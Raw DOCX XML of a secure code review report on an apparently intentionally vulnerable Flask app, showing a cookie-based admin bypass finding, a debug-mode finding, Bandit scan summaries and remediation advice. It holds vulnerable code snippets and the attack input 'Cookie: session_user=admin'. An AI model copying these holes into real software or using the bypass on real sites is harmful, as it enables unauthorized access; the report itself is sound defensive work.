        <w:t xml:space="preserve">Any unauthenticated visitor can gain administrative access simply by setting a cookie: Cookie: session_user=admin. This completely bypasses authentication and authorization.</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username = request.cookies.get("session_user", "")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if username == "admin":</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return "Welcome, administrator. ..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Authorization decisions must be based on server-verified state (a signed session or a database lookup tied to an authenticated user id), never on a raw, client-writable cookie value.</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if "user_id" not in session:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return redirect("/login")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if not session.get("is_admin"):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    abort(403)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #10  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Debug Mode Enabled in Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D68910"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-489: Active Debug Code   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 127</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application is run with debug=True and bound to 0.0.0.0 (all network interfaces).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Flask's debug mode exposes the interactive Werkzeug debugger in the browser on unhandled exceptions, which allows arbitrary Python code execution for anyone who can trigger an error and reach the debugger console — a critical exposure if ever left on in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence (vulnerable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app.run(host="0.0.0.0", debug=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Disable debug mode in any environment reachable outside local development, and run the app behind a production WSGI server (gunicorn/uWSGI) rather than Flask's built-in dev server. Scope network binding to what the deployment actually requires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediated 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333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">app.run(host="127.0.0.1", debug=False)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># In production: run via gunicorn behind a reverse proxy, not app.run().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Static Analysis Tool Output (Bandit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Before Remediation — Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bandit 1.9.4 was run against vulnerable_app/app.py. Full raw output is included as analysis/bandit_report.txt alongside this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rPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D68910"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E86C1"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 After Remediation — Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The identical scan was re-run against fixed_app/app.py. All High and Medium findings were resolved; the 3 remaining Low-confidence notices are informational only (Bandit flagging the mere use of the subprocess module and a relative executable path for the allow-listed ping command, which is expected and low-risk given the validation in place).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rPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">3 (informational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Conclusion and Overall Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The reviewed application contained ten vulnerabilities spanning injection (SQL, OS command, template), weak cryptography, insecure deserialization, broken access control, and insecure configuration — a representative cross-section of the OWASP Top 10. All ten were remediated and independently re-verified with static analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond the specific fixes above, the following practices are recommended for ongoing secure development:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run SAST tools (Bandit, Semgrep, or similar) in CI on every pull request, failing the build on new High/Medium findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adopt parameterized queries / an ORM (SQLAlchemy) by default rather than raw string-built SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Centralize authentication/authorization in one place (a decorator or middleware) rather than re-checking ad hoc per-route.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep secrets out of source control entirely; use environment variables or a secrets manager, and rotate them regularly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add dependency scanning (pip-audit / Dependabot) to catch known-vulnerable third-party libraries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform a lightweight secure code review checklist pass before merging any code that touches authentication, file I/O, or shell/database calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t xml:space="preserve">— End of Report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4B5"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pPr>
      <w:spacing w:after="120" w:before="26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2026-07-12T06:28:30.916Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-12T06:28:30.929Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>